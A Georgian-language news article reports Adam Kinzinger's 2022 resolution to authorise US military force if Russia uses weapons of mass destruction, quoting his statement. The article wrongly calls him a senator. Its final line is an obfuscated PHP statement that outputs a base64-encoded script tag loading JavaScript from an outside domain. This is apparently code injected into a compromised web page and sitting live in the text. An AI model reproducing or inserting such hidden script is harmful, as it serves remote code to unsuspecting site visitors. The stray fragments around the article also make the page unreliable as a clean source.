celsiusi
ავერსი შნაიდერი
ამერიკელმა სენატორმა, ადამ კინზინგერმა რეზოლუცია წარადგინა, რომლის მიხედვით, აშშ-ის პრეზიდენტს სამხედრო ძალების გამოყენების უფლება ექნება რუსეთის მიერ ქიმიური, ბიოლოგიური ან ბირთვული იარაღის გამოყენების შემთხვევაში. 
 
სენატორის მიერ გამოქვეყნებული განცხადების მიხედვით, ინიციატივა, სახელწოდებით „2022 წლის რეზოლუცია ამერიკის მოკავშირეების დასაცავად სამხედრო ძალების გამოყენების ნებართვის შესახებ“ ხელისუფლებას უფლებას მისცემს, გამოიყენოს აშშ-ის შეიარაღებული ძალები უკრაინის ტერიტორიული მთლიანობის დასაცავად იმ შემთხვევაში, თუ ვლადიმერ პუტინი გააძლიერებს თავის უსამართლო ომს აშშ-ის დემოკრატიული მოკავშირეების წინააღმდეგ.
 
„მეორე მსოფლიო ომის შემდეგ ამერიკამ მკაფიოდ დააფიქსირა ჩვენი პოზიცია – თავისუფლებისადმი ჩვენმა ერთგულებამ ავტოკრატები თავდაცვაზე გადაიყვანა და გააძლიერა დემოკრატიები მთელ მსოფლიოში. ბოლო ათწლეულის განმავლობაში ჩვენ ვნახეთ, რომ ეს გადაწყვეტილება მერყეობდა და ტირანებმა, ვლადიმერ პუტინის მსგავსად, გამოიყენეს ეს დაუცველობა. დღეს ამერიკას აქვს შესაძლებლობა, კიდევ ერთხელ დაადასტუროს ჩვენი მხარდაჭერა თავისუფლების მაძიებელი ხალხის მიმართ და მტკიცედ შეეწინააღმდეგოს ავტორიტარიზმს. მე წარვადგენ ამ რეზოლუციას, როგორც მკაფიო წითელ ხაზს, რათა ადმინისტრაციამ მიიღოს შესაბამისი ზომები, თუ რუსეთი გამოიყენებს ქიმიურ, ბიოლოგიურ ან/და ბირთვულ იარაღს. ჩვენ უნდა დავდგეთ კაცობრიობის მხარდასაჭერად და ჩვენ უნდა დავდგეთ ჩვენს მოკავშირეებთან ერთად. როგორც აშშ-ის პრეზიდენტმა თქვა, პუტინი უნდა შეჩერდეს. შესაბამისად, მსოფლიოს უდიდესი არმიის მთავარსარდალს უნდა ჰქონდეს უფლებამოსილება და საშუალებები, განახორციელოს საჭირო ქმედებები ამისთვის“, – ნათქვამია ადამ კინზინგერის განცხადებაში.
 
 
1268
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");